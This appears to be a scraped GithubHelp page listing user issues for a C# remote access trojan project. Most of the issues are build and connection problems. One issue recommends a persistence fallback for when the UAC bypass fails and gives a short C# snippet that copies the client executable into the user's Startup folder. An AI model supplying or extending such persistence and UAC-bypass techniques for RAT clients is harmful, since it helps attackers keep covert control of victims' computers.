GithubHelp home page GithubHelp logo

c-sharp-r.a.t-server's People

Contributors

advancedhacker101 avatar elektrokill avatar philipmur avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

c-sharp-r.a.t-server's Issues

Connected , but not really connected

Hey. My console says connected, but my server app doesnt show any clients.
I run both server AND client on my pc. is that the problem?
thanks.

Как сделать билд?

Я искал искал кнопку для того что бы создать этот билд но не нашел если ты скажешь про TuTClient то я пробовал его компилить но он не компилиться почему то. По идее функционал очень хороший респект но то что она не компилирует файл для отправки клиенту это плохо.

Run on linux

Hi, in the code I see a variable IsLinuxServer.
Does it mean the server can run also on linux?
If yes how can I run it on linux?
Thanks

Not really a issue more of a recommendation

When using persistence UAC bypass it requests you upload files to the exe directory, what you should do is use string a = Application.StartupPath; then pass that info back to the server and begin a automatic transfer. You could also add a loading bar to indicate the progress of the bypass.

IF BYPASS FAILS
Wrap the bypass statement in a try catch, If for some unknown reason the bypass fails it #will just add a copy of the exe to the current user startup path (Not protected by UAC) so either way it will boot with system.

code for the catch

if(File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "/tutClient.exe"))
{
}
else
{
File.Copy(Application.ExecutablePath, Environment.GetFolderPath(Environment.SpecialFolder.Startup));
}

Reason I added the if statement inside the catch is it wont throw a error if the file already exists in the startup folder, you can either use that method or nest the try catch statements

Connecting Issue

I have started server program and clicked start server button and then I ran client program but it won't connect to server, it's just repeating connection attempt!!!

Hi how to build the client?

I want a build a client.exe but don't find button for it. If you say about TutClient and say to build this client yes i try to build the TutCleint but he do not compilable

Handshake failed?

EDIT: sorry was meant for the client side.

I'm currently getting this issue when I'm trying to connect.

System.IO.IOException: 'The handshake failed due to an unexpected packet format.'

this is the code that's giving me the error.
if (IsLinuxServer) { _sslClient = new SslStream(new NetworkStream(_clientSocket), false, new RemoteCertificateValidationCallback(ValidateSSLConnection), null); _sslClient.AuthenticateAsClient(""); //this is the highlighted line giving error. LaunchHearthbeat(); }

the line that gives the error is _sslClient.AuthenticateAsClient("");

I thought maybe it was my issue with ports etc. however I have an older version of your RAT when i first started following you along way back when. that connects just fine.

release issue

it doesn't work for release mode.in debug mode it works when we compile in release mode it shows error

Missing DLL's

Do you have any plans on uploading the needed DLL's?
I can't compile any of your programs because there are missing libraries.
Thank you - Brian

File browser bug

Cannot use the file browser bc when i list the drives, when i want to enter them it tells me it's not a driectory

File Manager

Bro your files directory doesn't work.As click on enter directory it shows selected item is not directory...although it is directory

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.